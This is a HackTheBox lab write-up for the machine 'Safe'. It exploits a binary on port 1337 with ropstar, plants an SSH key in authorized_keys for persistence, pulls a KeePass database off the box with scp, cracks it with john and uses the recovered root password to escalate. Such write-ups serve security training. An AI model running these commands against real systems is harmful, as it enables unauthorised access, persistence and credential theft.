HackTheBox - Safe

2 minute read

Safe was an easy 20 point box created by ecdo. It started out with pwning a binary to get a shell as user and then abusing KeePass to get root.

User.txt

Nmap


We start the box with a quick TCP nmap scan:

# ports=$(nmap -sT -p- --min-rate=5000 --max-retries=2 10.10.10.147 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && 
nmap -sV -sC -T4 -p$ports 10.10.10.147

PORT     STATE SERVICE VERSION                                            
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)      
| ssh-hostkey:                                                            
|   2048 6d:7c:81:3d:6a:3d:f9:5f:2e:1f:6a:97:e5:00:ba:de (RSA)            
|   256 99:7e:1e:22:76:72:da:3c:c9:61:7d:74:d7:80:33:d2 (ECDSA)           
|_  256 6a:6b:c3:8e:4b:28:f7:60:85:b1:62:ff:54:bc:d8:d6 (ED25519)         
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))                                                                                                                      
1337/tcp open  waste?


HTTP


Checking out http://10.10.10.147/ we get the Apache 2 Debian Default Page. Checking the source code we see the following:

<!-- 'myapp' can be downloaded to analyze from here
     its running on port 1337 -->

Going to http://10.10.10.147/myapp will download the binary for us.


Binary Exploitation


We can use a tool called ropstar to automatically pwn this binary for us:

# python ropstar.py /root/HTB/boxes/safe/myapp -rhost 10.10.10.147 -rport 1337
...
[*] Switching to interactive mode
$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth)


Flag


We can simply cat the user flag from our pwn shell:

$ cat /home/user/user.txt
7a29ee...


Root.txt

SSH Shell


To get a better shell we add the public key of our attacking host to /home/user/.ssh/authorized_keys and SSH in:

$ echo 'ssh-rsa AAAA...kzh root@kali' > /home/user/.ssh/authorized_keys 

# ssh -i id_rsa user@10.10.10.147
user@safe:~$


KeePass


Checking out the users home directory we notice a KeePass Password Database file and a bunch of images:

user@safe:~$ ls -la
-rw-r--r-- 1 user user 1907614 May 13 11:15 IMG_0545.JPG
-rw-r--r-- 1 user user 1916770 May 13 11:15 IMG_0546.JPG
-rw-r--r-- 1 user user 2529361 May 13 11:15 IMG_0547.JPG
-rw-r--r-- 1 user user 2926644 May 13 11:15 IMG_0548.JPG
-rw-r--r-- 1 user user 1125421 May 13 11:15 IMG_0552.JPG
-rw-r--r-- 1 user user 1085878 May 13 11:15 IMG_0553.JPG
-rw-r--r-- 1 user user    2446 May 13 11:15 MyPasswords.kdbx

KeePass is an open source password manager where you can store passwords in encrypted databases which can only be unlocked with the master password/key file.

Since there are six random images present we can assume that one of these is the key file. Lets scp the kdbx file and the images over to our attacking hosts working directory:

# scp user@10.10.10.147:/home/user/MyPasswords.kdbx .
# scp user@10.10.10.147:/home/user/IMG_0545.JPG .
# scp user@10.10.10.147:/home/user/IMG_0546.JPG .
# scp user@10.10.10.147:/home/user/IMG_0547.JPG .
# scp user@10.10.10.147:/home/user/IMG_0548.JPG .
# scp user@10.10.10.147:/home/user/IMG_0552.JPG .
# scp user@10.10.10.147:/home/user/IMG_0553.JPG .


Cracking KeePass


To crack the KeePass Database File we’ll use a utility called keepass2john from JohnTheRipper that will extract the hash from the KeePass database file with the keyfile we specifiy:

# keepass2john 
Usage: keepass2john [-k <keyfile>] <.kdbx database(s)>

By process of elimination we find out IMG_0547.JPG is the key file and the password is bullshit:

# keepass2john -k IMG_0547.JPG MyPasswords.kdbx > 547_hash

# john --wordlist=/root/rockyou.txt 547_hash
...
bullshit         (mypass)


kpcli


Using kpcli, a command line interface for KeePass, we can open the MyPasswords.kdbx file and get the root password:

# kpcli --key IMG_0547.JPG --kdb MyPasswords.kdbx
Please provide the master password: bullshit

kpcli:/MyPasswords> help
...
    show -- Show an entry: show [-f] [-a] <entry path|entry number>
...                                            
kpcli:/MyPasswords> show 0
Title: Root password
Uname: root
 Pass: u3v2249dl9ptv465cogl3cnpo3fyhk
  URL: 
Notes: 


Flag


Within our SSH shell as user we just have to run the following and we get root:

user@safe:~$ su root
Password: u3v2249dl9ptv465cogl3cnpo3fyhk

root@safe:/home/user# cat /root/root.txt 
d7af23...